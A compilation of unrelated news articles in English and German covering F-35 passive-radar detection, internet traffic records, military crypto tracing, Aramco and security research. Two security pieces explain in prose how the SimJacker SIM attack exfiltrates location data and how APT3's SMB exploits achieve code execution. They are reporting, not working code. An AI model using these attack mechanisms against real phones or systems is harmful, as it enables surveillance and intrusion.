Stealthy no more? A German radar vendor says it tracked the F-35 jet in 2018 — from a pony farm

COLOGNE, Germany — In the illustrious history of the F-35 fighter jet, add a pony farm outside Berlin as the place where one company claims the plane’s stealth cover was blown.

The story that follows is a snapshot in the cat-and-mouse game between combat aircraft — designed to be undetectable by radar — and sensor makers seeking to undo that advantage. In the case of the F-35, the promise of invisibility to radar is so pronounced that it has colored much of the jet’s employment doctrine, lending an air of invincibility to the weapon: The enemy never saw it coming.

But technology leaps only last so long, and Russia and China are known to be working on technology aimed at nixing whatever leg up NATO countries have tried to build for themselves.

Now, German radar-maker Hensoldt claims to have tracked two F-35s for 150 kilometers following the 2018 Berlin Air Show in Germany in late April of that year. The company’s passive radar system, named TwInvis, is but one of an emerging generation of sensors and processors so sensitive and powerful that it promises to find previously undetectable activities in a given airspace.

What happened in Berlin was the rare chance to subject the aircraft — stealthy design features, special coating and all — to a real-life trial to see if the promise of low observability still holds true.

Stories about the F-35-vs.-TwInvis matchup had been swirling in the media since Hensoldt set up shop on the tarmac at Berlin’s Schönefeld Airport, its sensor calibrated to track all flying demonstrations by the various aircraft on the flight line. Media reports had billed the system, which comes packed into a van or SUV and boasts a collapsible antenna, as a potential game changer in aerial defense.

Air situation picture provided by Hensoldt’s passive radar tracking system, which covers the airspace of southern Germany. (Hensoldt)

At the same time, F-35 manufacturer Lockheed Martin was still in the race to replace the German Tornado fleet, a strategically important opportunity to sell F-35s to a key European Union member state. The company set up a sizable chalet at the air show, bringing brochures and hats depicting the aircraft together with a German flag.

Showtime in Schönefeld

The most convincing pieces of marketing for Hensoldt were meant to be two F-35s flown in from Luke Air Force Base, Arizona. The trans-Atlantic journey marked the jets’ longest nonstop flight, at 11-plus hours, officials said at the time.

But Lockheed and the U.S. Air Force did not fly the jets during the show so that its engineers — and anyone walking by the company’s booth, for that matter — could see if the aircraft would produce a radar track on a big screen like the other aircraft.

Reporters never got a straight answer on why the F-35s stayed on the ground. One explanation was that there was no approved aerial demonstration program for the aircraft that would fit the Berlin show’s airspace limitations.

Regardless of the reason, with no flight by the F-35, companies could not try out their technologies on perhaps the most illustrious of test cases. Passive radar equipment computes an aerial picture by reading how civilian communications signals bounce off airborne objects. The technique works with any type of signal present in airspace, including radio or television broadcasts as well as emissions from mobile phone stations. The technology can be effective against stealthy aircraft designs, which are meant to break and absorb signals from traditional radar emitters so that nothing reflects back to ground-station sensors, effectively leaving defensive-radar operators in the dark.

Because there are no emitters, passive radar is covert, meaning pilots entering a monitored area are unaware they are being tracked.

There are limitations to the technology. For one, it depends on the existence of radio signals, which may not be a given in remote areas of the globe. In addition, the technology is not yet accurate enough to guide missiles, though it could be used to send infrared-homing weapons close to a target.

Hensoldt said various radio station broadcasts in the area, especially a bunch of strong Polish FM emitters broadcasting deep into Germany, improved TwInvis calibration during the Berlin show. The border is about 70 kilometers away from Schönefeld Airport.

During a system demonstration by Hensoldt at the exhibit, company engineers convened around a large TwInvis screen showing the track of a Eurofighter performing a thundering aerial show nearby. But the prized target of opportunity, the two F-35s, remained sitting on the tarmac.

Horse country

As the event ended, Hensoldt kept a close eye on any movement of the heavily guarded F-35s on the airfield. As exhibitors began to clear out, it looked like the chance of catching the planes during their inevitable departure back home would be lost.

But in Hensoldt’s telling, someone had the idea of setting up TwInvis outside the airport, which ended up being at a nearby horse farm.

Camped out amid equines, engineers got word from the Schönefeld tower about when the F-35s were slated to take off. Once the planes were airborne, the company says it started tracking them and collecting data, using signals from the planes’ ADS-B transponders to correlate the passive sensor readings.

See American F-35 fighter jets arrive in Germany from Luke Air Force Base, Arizona, for an appearance at the 2018 Berlin Air Show. This was the aircraft’s first appearance at the show.

A spokeswoman for the F-35 Joint Program Office said she was unable to comment by press time on Hensoldt’s claim of having tracked the aircraft in Berlin or about the plane’s general vulnerability to passive radar.

There are several horse and pony farms in the vicinity of Schönefeld Airport, offering everything from riding lessons to horse-themed summer camps for kids. A woman answering the phone at the business closest to the airfield, “Keidel Ranch,” a couple kilometers to the west, confirmed to Defense News that “someone” from the Berlin Air Show had showed up and stayed for “two or three days.”

Hensoldt previously said its passive-radar detection works regardless of whether the targeted aircraft has radar reflectors (so-called Luneburg lenses) installed. Those features — little knobs on the roots of the F-35 wings — can be seen in photos released by the U.S. Defense Department on the occasion of the journey to Berlin.

The reflectors are often mounted on the stealthy aircraft to make them visible to local air traffic authorities during friendly missions, like air show appearances. They artificially create a radar cross section in the frequency bands in which airspace-deconfliction radars operate so that traditional, defense radar systems know what they are dealing with.

According to a source close to the program, Luneburg lenses mounted on the departing F-35s would make it a certainty that the jets can be tracked, suggesting that the situation would be different without the reflectors installed.

“When the F-35 is not flying operational missions that require stealth — for example, at air shows, ferry flights or training — they ensure air traffic controllers and others are able to track their flight to manage air space safety,” Lockheed spokesman Michael Friedman wrote in a statement to Defense News. “The Air Force can best address questions related to their F-35s participation at the Berlin Air Show.”

Hensoldt argues that passive-radar detection works in a different spectrum, making the presence (or absence) of reflectors irrelevant. In layman’s terms, passive radar tracks the entire physical shape of planes, versus being triggered by smaller, angular features on the body of a jet.

Talking stealth

Whatever Hensoldt’s claims, the German military has embraced passive radar as an emerging technology key for future capabilities, including air defense. Earlier this year, the country’s Air Force was in the process of creating a formal acquisition track for passive sensing, Defense News reported.

Airman 1st Class Emily Greaves, 33rd Maintenance Squadron nondestructive inspection apprentice, uses a transducer to check for cracks in the low-observable paint on an F-35A. The transducer picks up clear sound vibrations to identify cracks that would diminish the stealth capability of the aircraft. (Senior Airman Andrea Posey/U.S. Air Force)

That step came after the Defence Ministry sponsored a weeklong “measuring campaign” in southern Germany last fall aimed at visualizing the entire region’s air traffic through TwInvis.

Also noteworthy, in the year and a half that followed the air show, emphasis on stealth features for the Franco-German-Spanish Future Combat Air System program, meant to be Europe’s next-generation warplane, shifted.

Officials from the industry teams involved in the program increasingly converged around the idea that stealth as we know it had lost its shinethis following rumors circling the German defense scene about how Hensoldt had apparently managed to light up the American aircraft on the radar screen.


Valerie Insinna in Washington contributed to this report.








Apple-Update verursacht Datenrekord: 7,1 Terabit pro Sekunde

Die Veröffentlichung des iPhone-Betriebssystems iOS 13 am Donnerstagabend hat beim weltweit größten Internetknoten DE-CIX in Frankfurt am Main offenbar zu einem Datenrekord geführt. Mehr als 7,1 Terabit pro Sekunde liefen zeitweise durch die Leitungen. Das entspricht mehr als 2,1 Millionen Updates pro Stunde.

Wie Apple den Daten-Weltrekord pulverisierte

Einblick. Seit wenigen Tagen gibt es das neue iPhone-Betriebssystem iOS 13. Beim weltgrößten Internetknoten in Frankfurt war der Download-Ansturm so groß wie nie: 7,1 Terabit pro Sekunde.

Apple hat am Donnerstagabend sein neues Smartphone-Betriebsystem iOS 13 herausgebracht – und dabei prompt einen neuen Daten-Weltrekord beim weltgrößten Internetknoten, der in Frankfurt am Main betrieben wird, verursacht. Die meisten iPhones konnten die Installationsdatei ab 19 Uhr deutscher Zeit herunterladen.

Wer zuvor bereits das bis dahin aktuelle Betriebssystem iOS 12.4 nutzte, musste für das Update eine Installationsdatei von etwa 2,2 Gigabyte Größe von den Servern des US-Techkonzerns kopieren. Augenscheinlich luden so viele Apple-Kunden die neue Version direkt nach Erscheinen herunter, dass Internet-Backbones weltweit deutlich stärker ausgelastet wurden als normalerweise.

Der weltgrößte Internetknoten DE-CIX in Frankfurt vermeldete umgehend einen neuen Weltrekord für transferiertes Dartenvolumen pro Sekunde: Gegen 21 Uhr liefen am Donnerstag mehr als 7,1 Terabit pro Sekunde durch die Leitungen. Damit übertraf die DE-CIX-Technik die eigene Rekordmarke von 6,8 Terabit pro Sekunde vom Dezember 2017 deutlich.

„Stündlich mehr als 2,1 Millionen iPhones upgedatet“

„Wir nehmen an, dass das Release des neuen Apple-Betriebssystem iOS 13 für diesen Schub gesorgt hat“, kommentierte DE-CIX-Geschäftsführer Harald Summa den Rekord auf Anfrage von WELT. „Mit einem Datenstrom von sieben Terabit pro Sekunde könnten stündlich mehr als 2,1 Millionen iPhones auf das neue Betriebssystem upgedatet werden.“ In der vom DE-CIX herausgegebenen Leistungskurve ist deutlich sichtbar, wie die Transferrate ab 19 Uhr von gut sechs auf über sieben Terabit pro Sekunde sprang.

Apple kann sich regelmäßig damit brüsten, dass die jeweils neueste Version von iOS sehr schnell auf einer hohen Prozentzahl von Kundengeräten installiert wird. Ende August nutzten beispielsweise 88 Prozent das bis dahin aktuelle Betriebssystem iOS 12. Googles Android-Nutzer dagegen müssen oft lange auf Updates ihrer Smartphone-Hersteller warten. Viele Geräte im Android-Universum werden gar nicht mehr mit neuer Software versorgt. Anfang Juni liefen gerade einmal gut zehn Prozent aller Android-Geräte mit der aktuellen Android-Version 9.

Apple dagegen hatte in der Vergangenheit angesichts des Ansturms der Kunden sogar des öfteren Probleme, genügend Download-Kapazitäten zur Verfügung zu stellen. Das klappte, zeigt die Statistik, dieses Jahr besser. Doch der Konzern hat mit Blick auf eine optimale Lastenverteilung im Internet einen ungeschickten Zeitpunkt für die Veröffentlichung seines Updates gewählt. Denn die Internet-Infrastruktur verzeichnet regelmäßig eine Lastspitze um 21 Uhr abends, wenn sowohl die USA als auch Europa und Teile des Nahen Ostens und Asiens gleichzeitig intensiv im Netz unterwegs sind.

Datendurchsatz in Frankfurt seit 2014 verdoppelt

DE-CIX ist aktuell der weltweit größte internationale Knotenpunkt des Internets. Diese Knotenpunkte sind mit zentral gelegenen Flughäfen vergleichbar: Wer von Dubai nach San Franzisco will, kann das über Knoten wie jenen in Frankfurt. Über 60 Prozent des Internetverkehrs im Frankfurter Knoten sind internationalen Ursprungs.

DE-CIX ist ein weltweit führender Betreiber von Internetknoten. 1995 in Betrieb genommen, managt das Unternehmen global 18 Internetknoten in Europa, Indien, dem Nahen Osten und den USA, die allesamt miteinander vernetzt sind. Dem Standort in Frankfurt kommt dabei eine Schlüsselrolle zu. An den Knoten koppeln große Internetprovider, internationale Netzbetreiber wie Cloudflare sowie Internet-Unternehmen wie Google, Amazon oder Facebook ihre Netze zusammen, um Daten auszutauschen.

„Der Datendurchsatz am DE-CIX in Frankfurt hat sich seit 2014 weit mehr als verdoppelt und wird sich auch in Zukunft rasant weiterentwickeln“, erklärt Summa. „Alleine in 2018 ist die angeschlossene Kundenkapazität im Vergleich zum Vorjahr um über 35 Prozent auf mehr als 45 Terabit gestiegen.“

Dieser Artikel erschien zuerst bei




US Army Seeks Blockchain Experts Who Can Trace Bitcoin in Real-Time

The United States Army Contracting Command (ACC) of New Jersey has issued a pre-solicitation notice for cryptocurrency investigation service providers. 

As a pre-solicitation, posted on July 25, the notice and the ACC’s responses do not bind ACC to solicit or award a contract.

For use in criminal investigations

According to the ACC, the cryptocurrency analytics solution is being sought for use by the U.S. Army Criminal Investigation Command (USACIDC) for use in criminal investigations and other missions.

The notice outlines that the contractor must provide a cloud-based, online service — not reliant on hardware or software — that can assist law enforcement in identifying and pursuing actors using cryptocurrencies for illicit purposes such as fraud, extortion and money laundering.

The contractor should provide the source of the cryptocurrency transactions, with the capacity to offer multi-cryptocurrency analysis from Bitcoin (BTC) to other major cryptocurrencies. 

Other requirements include providing “real-time Bitcoin and other cryptocurrency transaction tracing,” including service attribution and identification, as well as being able to identify transaction patterns and interactions with other entities.

Government and army alike turn to blockchain

In fall 2018, a Diar report had revealed that  U.S. government agencies had tripled their investment in blockchain intelligence firms that year.

The vast majority of 2018 blockchain intelligence government deals were reportedly contracted to New York-based blockchain analytics firm Chainalysis, which had — as of that date — signed deals with government agencies totaling $5.3 million.

This August, Cointelegraph reported that the U.S. Air Force had secured new contracts with smart contract startup Simba Chain and blockchain data management firm Constellation, with a focus on using the technology for supply chain and data management.

Meanwhile, in an interview earlier this month Grammy award-winning music artist and Bitcoin advocate Akon quipped that the value of fiat currencies such as the U.S. dollar is ultimately only sustained by military might.






ARAMCO: 500 Milliarden Dollar in einer Nacht verloren

Person der Woche: Amin Nasser, Vorstandvorsitzender Aramco

Der Raketenangriff auf Ölanlagen trifft Saudi-Arabien nicht nur militärisch. Der wirtschaftliche Schaden ist größer als geahnt, denn der Ölkonzern Aramco steht kurz vor dem Börsengang. Nun ist das teuerste Unternehmen der Welt plötzlich drastisch weniger wert.

Amin Nasser ist der Vorstandsvorsitzende von Saudi Aramco. Der 61-jährige Ingenieur, ein leiser Mann mit rahmenloser Brille, führt den weltgrößten Ölkonzern mit 76.000 Mitarbeitern. In wenigen Wochen will er ihn an die Börse bringen. Die internationalen Finanzmärkte warten schon voller Spannung darauf. Denn Aramco soll der größte Börsengang der Menschheitsgeschichte werden. In Riad erhofft man sich eine gigantische Marktbewertung von mehr als zwei Billionen Dollar. Zum Vergleich: Die Lufthansa ist sieben Milliarden wert. Aramco soll also so teuer werden wie 300 Lufthansa-Konzerne zusammen.

Nun haben die Drohnenangriffe – ob sie nun von jemenitischen Huthi-Rebellen oder von anderen iranischen Hilfstruppen gekommen sind – Saudi-Arabien nicht bloß militärisch und politisch empfindlich getroffen. Vor allem der wirtschaftliche Schaden ist enorm. Denn schlagartig ist die Bewertung von Aramco dramatisch abgesackt. “Globale Investoren sehen ab sofort die Sonderrisiken bei Aramco viel größer als bislang. Die Assets werden daher massiv heruntergestuft”, heißt es bei Petro-Analysten aus London.

Selbst wenn die Ölproduktion sich rasch wieder normalisieren sollte, werde der langfristige Wert des Unternehmens völlig neu eingeschätzt: “Man erkennt die Verletzlichkeit von Aramco. Niemand sieht den Konzern jetzt langfristig mehr wert als 1,5 Billionen Dollar.”

Damit hat der Raketenangriff Saudi-Arabien mindestens 500 Milliarden Dollar in einer einzigen Nacht gekostet.

Geplant war eine Erstnotiz des Konzerns bereits für Anfang November. Der neu installierte saudi-arabische Energieminister Prinz Abdulaziz bin Salman tönte noch vergangene Woche, dass das Königreich den Börsengang von Aramco “so schnell wie möglich” anstrebe. Man wollte die ersten Aktien – es sollte mit einem Prozent gestartet werden – zunächst an die heimische Börse bringen und im Jahr 2020 dann an einen internationalen Handelsplatz, wahrscheinlich London. Nun gerät dieser Zeitplan ins Wanken.

Viel profitabler als Apple

Der Verkauf von Aramco-Anteilen ist das Prestigeprojekt von Kronprinz Mohammed bin Salman. Er wollte die Verkaufserlöse in neue Industrien investieren, um die saudische Wirtschaft jenseits von Öleinnahmen zu diversifizieren. Sein Plan sah vor, erst einmal fünf Prozent der Aramco-Anteile zu platzieren und damit 100 Milliarden Dollar zu erlösen. Daraus wird nun nichts.

Unter Analysten und Bankern wird fortan gestritten werden, was Aramco unter den neuen Vorzeichen wohl wert sein könnte. Die saudischen Agenten verbreiten das Argument, der profitabelste Konzern der Welt erleide in Wahrheit keinen nennenswerten Schaden und strotze vor Ertragskraft. Tatsächlich zeigt ein Blick in die Halbjahreszahlen (der bislang so streng verschwiegene Konzern macht für den Börsengang seine Bilanzzahlen neuerdings öffentlich), dass Aramco im ersten Halbjahr 2019 einen unglaublichen Vorsteuergewinn von 92,5 Milliarden Dollar und einen Umsatz: von 163,9 Milliarden Dollar erwirtschaftet hat.

Das heißt: Aramco macht jeden Tag 500 Millionen Dollar Gewinn. Täglich fördert das Unternehmen zehn Millionen Barrel, dreimal so viel wie der Ölkonzern ExxonMobil. Alleine an Dividenden hat Aramco im ersten Halbjahr 46,6 Milliarden Dollar ausgezahlt. Bislang gilt Apple als das profitabelste Unternehmen der Welt – doch Aramco verdient schlichtweg dreimal so viel wie der amerikanische Computerkonzern.

Gefahr durch westliche Klimapolitik

Zum Vergleich: Die bekanntesten Ölkonzerne der Welt – Chevron und Exxon Mobil aus den USA, BP aus Großbritannien, das britisch-niederländische Unternehmen Royal Dutch Shell und Total aus Frankreich – erzielten 2018 knapp 80 Milliarden Dollar Gewinn, allerdings zusammengerechnet. Betrachtet man also die gewaltige Ertragskraft von Aramco und die enormen Rohöl-Reserven, dann wäre eine Börsenbewertung von deutlich mehr als 1,5 Billionen immer noch gerechtfertigt.

Die Skeptiker allerdings argumentieren, dass der jetzige Anschlag zeige, wie anfällig der Konzern sei. Sollte sich der Konflikt zwischen Saudi-Arabien und Iran ausweiten, würde Aramco unmittelbar Schaden nehmen. Zugleich sei der Saudi-Konzern der weltgrößte Verlierer, wenn sich die westliche Welt im Zuge einer neuen Klimapolitik tatsächlich dekarbonisiere, seine Energieversorgung ohne Öl organisiere und Verbrennungsmotoren durch Elektromotoren ersetze.

Amin Nasser erinnert Investoren daran, dass man alsbald kein reiner Ölkonzern mehr sei. Man habe vor kurzem für gut 69 Milliarden US-Dollar (61,1 Milliarden Euro) die Mehrheit am saudi-arabischen Chemiekonzern Sabic erworben. Sabic stellt Kunststoffe, Metalle und Düngemittel her und ist mit einem Anteil von 25 Prozent auch Großaktionär beim Schweizer Spezialchemiekonzern Clariant. Nasser setzt also auf Chemie im “Downstream-Segment” und verkündet: “Wir bauen unser Handelsgeschäft aus und intensivieren unsere Innovationstätigkeiten durch wegweisende Initiativen wie die Herstellung von Rohstoffen und Chemikalien, nichtmetallischen Werkstoffen und Wasserstoffkraftstoffen.” Die Diversifikation wird aber nichts nutzen, wenn die eigenen Großraffinerien niedergebombt und Öl langfristig ein Auslaufmodell werden könnte. So oder so: 500 Milliarden sind nach dem ersten Angriff erst einmal weg.





1 Billion Mobile Users Vulnerable to Ongoing ‘SimJacker’ Surveillance Attack

More than one billion mobile users are at risk from a SIM card flaw being currently exploited by threat actors, researchers warn.

A vulnerability discovered in mobile SIM cards is being actively exploited to track phone owners’ locations, intercept calls and more – all merely by sending an SMS message to victims, researchers say.

Researchers on Thursday disclosed what they said is a widespread, ongoing exploit of a SIM card-based vulnerability, dubbed “SimJacker.” The glitch has been exploited for the past two years by “a specific private company that works with governments to monitor individuals,” and impacts several mobile operators – with the potential to impact over a billion mobile phone users globally, according to by researchers with AdaptiveMobile Security.

Simjacker has been further exploited to perform many other types of attacks against individuals and mobile operators such as fraud, scam calls, information leakage, denial of service and espionage,” said researchers with AdaptiveMobile Security in a post breaking down the attack, released Thursday.

They said they “observed the hackers vary their attacks, testing many of these further exploits. In theory, all makes and models of mobile phone are open to attack as the vulnerability is linked to a technology embedded on SIM cards.”

The attack stems from a technology in SIM cards called S@T Browser (short for SIMalliance Toolbox Browser). This technology, which is typically used for browsing through the SIM card, can be used for an array of functions such as opening browsers on the phone as well as other functions like setting up calls, playing ring tones and more.

From a high level, threat actors can send messages to victims that use the S@T Browser functionality in order to trigger proactive commands that are sent to the handset. The issue is impacted SIM cards that contain the S@T Browser technology do not check the origin of messages that use the S@T Browser, and also that SIMs allow data download via SMS, researchers said.

These messages contain a series of SIM Toolkit (STK) instructions and is specifically crafted to be passed on to the SIM Card within the device. Once the SMS is received by the SIM card, it uses the S@T Browser library as an execution environment, where it can trigger logic on the handset – mainly for requesting location and specific device information (IMEI).

The responses to these commands are sent back from the handset to the SIM card, where they are stored temporarily. Once the relevant information is retrieved from the handset, another proactive command is sent to the victim’s handset to send an SMS out with the information to the attacker’s handset.

“The location information of thousands of devices was obtained over time without the knowledge or consent of the targeted mobile phone users,” researchers said. “During the attack, the user is completely unaware that they received the attack, that information was retrieved, and that it was successfully exfiltrated. However the Simjacker attack can, and has been extended further to perform additional types of attacks.”

Once they have sent the message, attackers can launch an array of attacks utilizing the S@T Browser, including: location tracking, fraud, denial of service, malware spreading and call interception. Using the attack bad actors can also launch commands like playing a ring tone, sending short messages, setting up calls, and more.

Researchers said that they have seen many of these potential attacks being tested and used by the attacker group. While they did not name the group, they said: “We can say with a high degree of certainty, that the source is a large professional surveillance company, with very sophisticated abilities in both signaling and handsets.

To mitigate against the attack, users can “investigate if you have SIM cards with S@T Browser technology deployed in your network and if so whether any S@T Browser-specific proprietary security mechanisms can be applied,” researchers said.

Other recommendations include:

  • Determine whether existing network equipment can be configured to filter binary SMS messages from unauthorised sources.
  • Consider if current firewalls are simply only GSMA document ‘compliant’. “These GSMA documents should really only be used as a starting point for more effective protection,” according to researchers.
  • Review the ongoing investigation and research you are doing on what is being encountered in your network.

Researchers said that they have submitted the details of the exploit to the GSMA in terms of vulnerability disclosure, and “will continue to research how the attacks function, look for other variants of the Simjacker exploits and use of the vulnerability.”

While researchers say that the S@T protocol is used by mobile operators in at least 30 countries whose population adds up to over a billion people, in an email to Threatpost, the GSMA [stated] that the “potential vulnerability” impacts a “small minority of SIM cards.”

“This research specifically considers SIM cards which make use of a technology not used by most mobile operators, and requires a user to be sent specially coded messages containing commands for the SIM card,” a GSMA spokesperson told Threatpost. “The potential vulnerability is understood to not be widespread and mitigations have been developed for affected mobile networks to implement.”

Moving forward, “the GSMA has worked with the researchers and the mobile industry to create guidance for its members about how to identify which SIMs are impacted and ways to block these malicious messages, and has been working with the impacted member operators to help implement these mitigations,” the GSMA spokesperson told Threatpost.

Further findings from the exploit will be presented at Virus Bulletin 2019 in October.





China’s APT3 Pilfers Cyberweapons from the NSA

Large portions of APT3’s remote code-execution package were likely reverse-engineered from prior attack artifacts.

The advanced persistent threat (APT) group known as APT3, which researchers across the board link to the Chinese government, has built a full in-house battery of exploits and cybertools collectively dubbed “UPSynergy.” An analysis of the toolkit has uncovered a geopolitical cat-and-mouse spy game: It turns out that many parts of the package are likely gleaned from watching attacks by the National Security Agency’s Equation Group APT on target networks where APT3 also has a presence.

Prior research from Symantec shows that APT3 was able to acquire a variant of the NSA-developed cyberweapon known as EternalRomance – prior to the Shadow Brokers leak of the spy agency’s arsenal in 2017. It has been a bit of a mystery as to how APT3 accomplished that – but research from Check Point offers a hypothesis.

“The threat group known as APT3 recreated its own version of an Equation group exploit using captured network traffic,” according to the analysis, published Thursday. “We believe that this artifact was collected during an attack conducted by the NSA Equation Group against a network monitored by APT3, allowing it to enhance its exploit arsenal with a fraction of the resources required to build the original tool…One possible modus operandi – the Chinese collect attack tools used against them, reverse-engineer and reconstruct them to create equally strong digital weapons.”

APT3 (a.k.a Buckeye or UPS Team) from there went on to equip the reverse-engineered attack tool, named Bemstour, with an additional zero-day, researchers said. Bemstour is used by APT3 to gain remote code-execution on a victim’s machine; the enhancement consists of a new exploit that allows APT3 to cast a wider net in terms of victimology.

EternalRomance targeted mostly Windows 7 systems (as well as lower version of Windows NT where SMBv1 is located),” Check Point explained. “One of the problems in adapting EternalRomance to higher Windows versions was a patch introduced in Windows 8 which eliminated the possibility to use an information leak vulnerability leveraged by it.”

The NSA got around this by chaining EternalRomance to a different tool that exploited Windows 8, called EternalChampion, to create a hybrid exploit named EternalSynergy. APT3 instead found a whole new zero-day information leak exploit to bolt onto its EternalRomance variant, which allowed the group to upgrade their version to be effective against OS higher than Windows 7.

“All of this activity suggests that the group was not exposed to an actual NSA exploitation tool, as they would then not need to create another zero-day exploit,” according to the analysis. “We decided to name APT3’s bundle of exploits UPSynergy, since, much like in the case of Equation group, it combines two different exploits to expand the support to newer operating systems.”

Interestingly, the goal of the weapon is to deploy a payload on the victim’s machine which is injected to a running process using an implant, which bears striking resemblance to the Equation group’s DoublePulsar tool.

“As far as APT3’s implant is concerned, it seems likely that the DoublePulsar code was reused as is,” Check Point researchers noted. “The code is not executed directly, but has several layers of obfuscation. Essentially, the Equation Group’s DoublePulsar code is wrapped with an APT3 position independent crypter and loader.”

In all, the research shows a cyberspy drama played out between the United States and Beijing.

“If network traffic was indeed used by the group as a reference, the traffic was likely collected from a machine controlled by APT3,” Check Point researchers pointed out. “This means either a Chinese machine that was targeted by the NSA and monitored by the group, or a machine compromised by the group beforehand on which foreign activity was noticed. We believe the former is more likely, and in that case could be made possible by capturing lateral movement within a victim network targeted by the Equation Group.”

Along with spying on each other, the U.S. and China are apparently in the midst of a cyber-arms race to develop new exploits.

“Finding a zero-day info leak, recreating the exploit based on the aforementioned vulnerability, and utilizing a lot of internal undocumented structures of SMB in the implants, implies that there was a similar expertise with and analysis performed on SMB drivers (with an eye to exploiting them) on the Chinese side, roughly at the same time it was widely used by the NSA,” according to the analysis.

The zero-day that APT3 found (CVE-2019-0703) is “an information disclosure vulnerability [that] exists in the way […] the Windows SMB Server handles certain requests,” according to Microsoft. However, the flaw is actually a logical bug related to querying information from the Windows Named Pipes mechanism, according to Check Point, and not a vulnerability in the SMB protocol nor its implementation.

“While it can be triggered using SMB, there are other ways to leverage it, e.g. using the NtQueryInformationFile Windows API call that is unrelated to SMB,” the researchers said. “The bug resides within npfs.sys (Name Pipe File System driver) in a function named NpQueryInternalInfo. The latter is used to query named pipes and return a value called a file reference number….[the number] is a pointer to a kernel structure named CCB (Client Control Block). This is an undocumented struct defined in npfs.sys, which has a partial definition (named NP_CCB) provided by the ReactOS project. Clearly, this is not the intended value to be returned in this case, and the leak of this struct discloses useful information that can be leveraged by attackers.”

In APT3’s case, the group triggered the vulnerability by establishing an SMB connection to a named pipe on the victim’s machine via SMB.

“The method was used to determine the bitness of the attacked operating system and overwrite (using a write primitive) a field in the leaked structure, which eventually provided the group with remote code-execution,” according to Check Point.

Meanwhile, the original vulnerability (CVE-2017-0143) targeted by EternalRomance and repurposed by APT3 is rooted in a type confusion bug; as a result of type confusion between SMB messages, the server considers an unrelated SMB message as part of an SMB Transaction of a different type, and activates the wrong type of SMB handler.

“This handler in turn shifts the Transaction struct’s pointer to the incoming data buffer by the amount of data received in the SMB message,” said the researchers. “Because the pointer value was shifted by the wrong handler, data of further SMB messages (which are treated by the correct type of handler) can be potentially written outside the boundaries of the incoming data buffer. If there was successful grooming (i.e. the heap was correctly shaped beforehand), this out-of-bound write may allow us to overwrite an adjacent SMB Transaction structure.”

In all, the research shows two highly sophisticated nation-state actors jockeying for cyber-dominance with exploit developments and tool espionage.

“It’s not always clear how threat actors achieve their exploitation tools, and it’s commonly assumed that actors can conduct their own research and development or get it from a third party,” Check Point concluded. “In this case we have evidence to show that a third (but less common) scenario took place – one where attack artifacts of a rival (i.e. Equation Group) were used as the basis and inspiration for establishing in-house offensive capabilities by APT3.”






Wie US-Militär und Unternehmen um Hacker buhlen

Patrick Kiley von der IT-Sicherheitsfirma Rapid7

Die US-Luftwaffe karrte einen F35-Simulator zur DEF CON, BMW hielt gemeinsam mit chinesischen Security-Forschern einen Vortrag auf der Black Hat. Andere Organisationen und Unternehmen fremdelten noch.

“Hi, ich bin Will. Ich arbeite für die US Air Force“. Der bebrillte Mann im 80er-Jahre-Star-Wars-T-Shirt stand inmitten einer Traube aus Hackern im erstmals auf der Hackerkonferenz DEF CON errichteten „Aviation Village“ und erklärte den hinter ihm aufgebauten Flugsimulator. „Mit diesem Simulator machen sich unsere Piloten fit für Einsätze mit der F35, unserem modernsten Kampfflugzeug“. Die F35 – und natürlich der Simulator – verlasse sich auf große Mengen Programmcodes, den es abzusichern gelte.

Bemerkenswert an diesem Auftritt war nicht nur der Aufwand, den die US-Luftwaffe mit dem Aufbau des Simulators betrieb. Sondern auch, dass „Will“ mit vollem Namen Dr. Will Roper heißt und als Assistant Secretary for Acquisition, Technology and Logistics den kompletten Einkauf der US Air Force verantwortet. Und dass er somit über ein Budget von rund 40 Milliarden US-Dollar gebietet. Jährlich.

Typischerweise buhlen daher Lieferanten um Ropers Gunst. Auf der DEF CON, die in diesem Jahr zum 27. Mal stattfand, war es genau umgekehrt: Das Militär buhlte um die Aufmerksamkeit von Hackern. Im Gespräch mit c’t erklärte Roper, warum er zusammen mit dem US-Heimatschutzministerium, einer europäischen Airline und anderen Unternehmen das Aviation Village unterstützt: „Wir haben natürlich auch Hacker in unseren Reihen. Aber nicht genug und wahrscheinlich auch nicht die besten Talente in ihrem jeweiligen Fachgebiet.“ Die Software sei es, die die F35 so überlegen mache. Und wenn man beim Thema Software-Sicherheit den Kopf in den Sand stecken würde, liefe etwas „ganz, ganz falsch“. Daher wollen die Air Force und auch zivile Luftfahrtorganisationen im Rahmen von IT-Sicherheits-Events talentierten Hackern Zugriff auf die relevante Avionik gewähren.

Konsequenterweise organisierte das US-Verteidigungsministerium parallel zur DEF CON in einem benachbarten Hotel auch einen Live-Hacking-Wettbewerb, bei dem es darum ging, Sicherheitslücken in der 20.000 US-Dollar teuren Trusted Aircraft Information Download Station (TADS) des F15-Kampfjets aufzudecken. Laut US-Luftwaffe sammelt und verarbeitet TADS während des Flugs Daten von Kameras und anderen im Jet verwendeten Sensoren.

„Hackt unsere Stadt“: Im ICS-Village konnten Besucher der DEF CON versuchen, eine simulierte, vernetzte Smart City zu kapern.

Am Wettbewerb beteiligte Hacker kritisierten im Nachgang, dass sie zu wenig Zeit gehabt hätten, um sich mit den für sie völlig fremden Komponenten zu befassen. Denn Avionik ist für die meisten ein böhmisches Dorf. Umso bemerkenswerter, dass sie in weniger als zwei Tagen – teilweise unter Einsatz von Schraubenziehern, Zangen und Krokodilklemmen – diverse Bugs im TADS finden konnten. Patrick Kiley von der IT-Sicherheitsfirma Rapid7 (siehe Aufmacherbild) entdeckte bei dieser Gelegenheit einige üble Bugs in Bordsystemen von Kleinflugzeugen, über die sich unter anderem deren Autopilot ausschalten ließ. Weitere entdeckte Bugs hätten gar Systemausfälle verursachen können.

Die Vertreter der Luftfahrtindustrie, die im Aviation Village anzutreffen waren, sehen bis zur reibungslosen Zusammenarbeit aber noch einen weiten Weg. Denn die stark regulierte, von unzähligen Standards und Zertifizierungen geprägte Branche hat nach wie vor Berührungsängste mit den typischerweise unorthodox arbeitenden Hackern. Und die müssen sich ihrerseits erst an eben jene Standards und die bislang streng vor ihren Blicken abgeschirmten Technologien herantasten.

Die Automobilbranche ist da schon einen Schritt weiter. Tesla war schon 2015 als Unterstützer des ersten „Car Hacking Village“ auf der DEF CON, und im vergangenen Jahr ließ es sich auch Unternehmensgründer Elon Musk nicht nehmen, einen Vortrag auf der Konferenz zu halten. Das Bug-Bounty-Programm seines Unternehmens zahlt bis zu 15.000 US-Dollar pro Schwachstelle.

